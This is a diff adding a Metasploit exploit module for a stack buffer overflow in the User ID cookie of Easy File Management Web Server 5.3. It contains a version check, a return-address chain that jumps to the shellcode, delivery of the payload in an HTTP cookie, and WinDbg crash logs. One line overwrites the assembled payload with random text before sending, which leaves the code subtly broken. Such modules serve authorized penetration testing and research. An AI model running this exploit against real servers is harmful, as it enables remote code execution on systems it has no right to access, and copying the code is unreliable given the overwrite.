Easy File Management Web Server v5.3 Stack Buffer Overflow

modules/exploits/windows/http/efs_fmws_userid_bof.rb

@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking # Reliable memory corruption
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy File Management Web Server v5.3 Stack Buffer Overflow',
+      'Description'    => %q{
+          Easy File Management Web Server contains a stack buffer overflow
+        condition that is triggered as user-supplied input is not properly
+        validated when handling the User ID cookie. This may allow a remote
+        attacker to execute arbitrary code.
+      },
+      'Author'         =>
+        [
+          'superkojiman',  # Vulnerability discovery
+          'Julien Ahrens', # Exploit
+          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['OSVDB', '107241'],
+          ['EDB',   '33610'],
+          ['BID',   '67542'],
+          ['URL',   'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],
+          ['URL',   'http://www.web-file-management.com/']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'DefaultOptions' =>
+        {
+          'ExitFunction'   => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x0a\x0d;",
+          'Space'      => 3420 # Lets play it safe
+        },
+      'Targets'        =>
+        [
+          # Successfully tested efmws.exe (5.3.0.0) on:
+          # -- Microsoft Windows XP [Version 5.1.2600]
+          # -- Microsoft Windows    [Version 6.1.7600]
+          # -- Microsoft Windows    [Version 6.3.9600]
+          [ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ]
+          # PPR from ImageLoad.dll
+        ],
+      'DisclosureDate' => 'May 20 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])
+        ], self.class)
+  end
+
+  def check
+
+    #
+    # NOTE: Version 5.3 still reports "4.0" in the "Server" header
+    #
+
+    res = send_request_raw 'uri' => '/whatsnew.txt'
+    if not res
+      vprint_status "#{peer} - No response to request"
+      return Exploit::CheckCode::Unknown
+    end
+    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
+      version = "#{$1}"
+      vprint_status "#{peer} - Found version: #{version}"
+      if version == "5.3"
+        return Exploit::CheckCode::Appears
+      end
+    end
+    if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
+      return Exploit::CheckCode::Detected
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    #
+    # Fu to JMP ESP where payload lives
+    # NOTE: Opcode 'JMP ESP' only existed in V5.3
+    #
+
+    sploit =  rand_text(80)
+    sploit << [0x1001D8C8].pack("V")
+    sploit << rand_text(280)
+    sploit << [target.ret].pack("V")
+    sploit << [0xA445ABCF].pack("V")
+    sploit << [0x10010125].pack("V")
+    sploit << [0x10022AAC].pack("V")
+    sploit << rand_text(8)
+    sploit << [0x1001A187].pack("V")
+    sploit << [0x1002466D].pack("V")
+    sploit << payload.encoded
+
+    sploit = rand_text(2000)
+
+    print_status "#{peer} - Trying target #{target.name}..."
+
+    #
+    # NOTE: Successful HTTP request is required to trigger
+    #
+
+    send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path),
+      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
+    }, 5)
+
+  end
+end
+
+=begin
+
+#
+# 0x44f57d This will write UserID up the stack. If the UserID is to large it
+# will overwrite a pointer which is used later on at 0x468702
+#
+
+eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac
+eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
+fmws+0x4f57d:
+0044f57d f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+0:004> dd @esi
+01668084  41414141 41414141 41414141 41414141
+01668094  41414141 41414141 41414141 41414141
+016680a4  41414141 41414141 41414141 41414141
+016680b4  41414141 41414141 41414141 41414141
+016680c4  41414141 41414141 41414141 41414141
+016680d4  41414141 41414141 41414141 41414141
+016680e4  41414141 41414141 41414141 41414141
+016680f4  41414141 41414141 41414141 41414141
+
+(c38.8cc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc
+eip=00468702 esp=015197c0 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
+fmws+0x68702:
+00468702 ff5228          call    dword ptr [edx+28h]  ds:0023:41414169=????????
+
+=end